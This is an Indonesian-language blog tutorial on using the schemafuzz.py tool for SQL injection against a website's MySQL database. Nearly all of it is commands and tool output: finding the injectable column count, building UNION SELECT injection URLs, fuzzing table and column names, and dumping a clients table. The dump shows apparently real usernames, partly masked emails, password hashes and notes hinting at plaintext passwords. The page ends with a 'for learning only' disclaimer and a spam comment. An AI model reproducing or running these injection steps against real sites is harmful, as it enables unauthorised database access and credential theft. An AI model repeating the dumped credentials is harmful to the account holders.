SchemaFuzz Tutorial

Tutorial ini mencoba untuk menerangkan prinsip penggunaan SchemaFuzz

Step by Step

Untuk mencari Kolom gunakan Perintah Berikut :
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5" --findcol

Hasilnya :
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5--
[+] Evasion Used: "+" "--"
[+] 11:14:07
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 2
[+] SQLi URL: http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5
[-] Done!


Untuk Mencari Table dan Columns gunakan perintah Berikut :
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5" --fuzz

Hasilnya :
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5+and+1=2+union+select+darkc0de,1,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 10:38:29
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web1_db1
User: web1_u1@localhost
Version: 5.0.24a-Debian_9ubuntu2.4-log
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...

[+] Found a table called: tbl_user

[+] Now searching for columns inside table "tbl_user"
[!] Found a column called:user_name
[!] Found a column called:user_password
[!] Found a column called:user_id
[!] Found a column called:user_email
[-] Done searching inside table "tbl_user" for columns!

[+] Found a table called: tbl_clients

[+] Now searching for columns inside table "tbl_clients"
[!] Found a column called:passwd
[!] Found a column called:id
[!] Found a column called:email
[!] Found a column called:name
[!] Found a column called:login
[-] Done searching inside table "tbl_clients" for columns!

[-] [10:46:53]
[-] Total URL Requests 837
[-] Done

Mencari Username dan Password :
1. Sebelumnya kita harus mengetahui terlebih dahulu isi dari Table dari target yang telah digetahui.
2. Misalnya: Kita ingin mengetahui isi dari "tbl_clients"
Ketikkan Perintah sbb :
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5" -D web1_db1 -T tbl_clients --schema

Hasilnya :

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 11:52:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web1_db1
User: web1_u1@localhost
Version: 5.0.24a-Debian_9ubuntu2.4-log
[+] Showing Columns from database "web1_db1" and Table "tbl_clients"
[+] Number of Columns: 6

[Database]: web1_db1
[Table: Columns]
[0]tbl_clients: id,name,email,login,passwd,info

[-] [11:52:24]
[-] Total URL Requests 8
[-] Done

3. Mencari Username dan Password
Ketikkan Perintah sbb :
c:\python26>schemafuzz.py -u "http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5" -D web1_db1 -T tbl_clients -C id,name,email,login,passwd,info --dump

Hasilnya :
|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------------|

[+] URL:http://www.target.com/index.php?goleft=artikel&artikel=5+AND+1=2+UNION+SELECT+0,1,darkc0de,3,4,5--
[+] Evasion Used: "+" "--"
[+] 11:57:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: web1_db1
User: web1_u1@localhost
Version: 5.0.24a-Debian_9ubuntu2.4-log
[+] Dumping data from database "web1_db1" Table "tbl_clients"
[+] Column(s) ['id', 'name', 'email', 'login', 'passwd', 'info']
[+] Number of Rows: 12

[0] 3:Omi:info@xxx.co.id:omi:781ff87f27c4b64b:sbm banner:
[1] 4:impressions:info@xxx.com:impression:29bad1457ee5e49e:account impression body care:
[2] 5:tropicana:gvdfg@xxx.com:tropicana:29bad1457ee5e49e:client omi tropicana:
[3] 6:promonet:irwan1010@xxx.com:irwan:10e1a5dd14687cb9:Iklan Promonet, account dan iformasinya sementara di pegan irwa dulu....!!!!:
[4] 7:benQ:irwan1010@xxx.com:
[5] 8:natur_fiber:irwan1010@xxx.com:irwan1010:11af6ef86fcffb9e:sementara pakai account irwan dulu yah:
[6] 9:Auto2000 yaris:koko@xxx.com:koko:565491d704013245:yaris:
[7] 10:Ths:irwan1010@xxxx.com:irwanths:*2756784519FC06B:THS2 Toyota:
[8] 11:spark-hotel:irwan1010@xxx.com:spark-hote:*23AE809DDACAF96:spark-hotel (123):
[9] 12:vaseline:irwan_vega@xxx.com:vaseline:23da915511e26ade:pass : vaseline:
[10] 13:goodyear:irwan_vega@xxx.com:goodyear:10e1a5dd14687cb9:goodyear << username:
[11] 14:prestine:prestine@xxx.net:prestine:608302a84f1fd4c6:user : prestine

user : prestine:user : prestine

user : prestine:

[-] [11:57:38]
[-] Total URL Requests 14
[-] Done


Sekian ......
Tutorial ini hanya untuk tujuan Pembelajaran saja.

1 comment:

  1. nice.. tutor nya gan
    cek juga link saya disni internet provider indonesia buat ilmu agan aja

    ReplyDelete